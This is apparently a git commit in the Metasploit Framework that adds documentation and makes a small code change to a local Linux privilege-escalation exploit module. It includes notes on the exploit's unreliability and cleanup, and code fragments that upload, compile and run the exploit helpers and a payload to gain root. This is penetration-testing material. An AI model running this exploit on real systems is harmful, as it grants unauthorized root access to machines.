additional doc updates

bug/bundler_fix
h00die 2016-09-29 19:02:16 -04:00
parent bac4a25b2c
commit 7b0a8784aa
2 changed files with 8 additions and 2 deletions

View File

@ -2,6 +2,12 @@
This module (and the original exploit) are written in several parts: hello, doubleput, and suidhelper.
Mettle at times on this exploit will give back an invalid session number error. In these cases payload/linux/x64/shell/bind_tcp seemed to always work.
As of PR submission, the original shell becomes unresposive when the root shell occurs. Metasm fails to compile due to fuse.h being required.
As of PR submission, killing of the process hello and doubleput has to occur manually. /tmp/fuse_mount also needs to be unmounted and deleted.
## Creating A Testing Environment
There are a few requirements for this module to work:

View File

@ -127,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Local
vprint_status("Writing #{filename} to #{file_path}")
write_file(file_path, file_content)
end
cmd_exec("chmod +x #{file_path}");
cmd_exec("chmod +x #{file_path}");
register_file_for_cleanup(file_path)
end
@ -470,7 +470,7 @@ class MetasploitModule < Msf::Exploit::Local
upload_and_compile('doubleput', doubleput_file, doubleput, compile ? "gcc -o #{doubleput_file} #{doubleput_file}.c -Wall" : nil)
upload_and_compile('suidhelper', suidhelper_path, suid_helper, compile ? "gcc -o #{suidhelper_filename} #{suidhelper_filename}.c -Wall" : nil)
upload_and_compile('payload', payload_path, generate_payload_exe)
#cmd_exec("chmod 555 #{payload_filename}")
print_status('Starting execution of priv esc. This may take about 120 seconds')
cmd_exec(doubleput_file)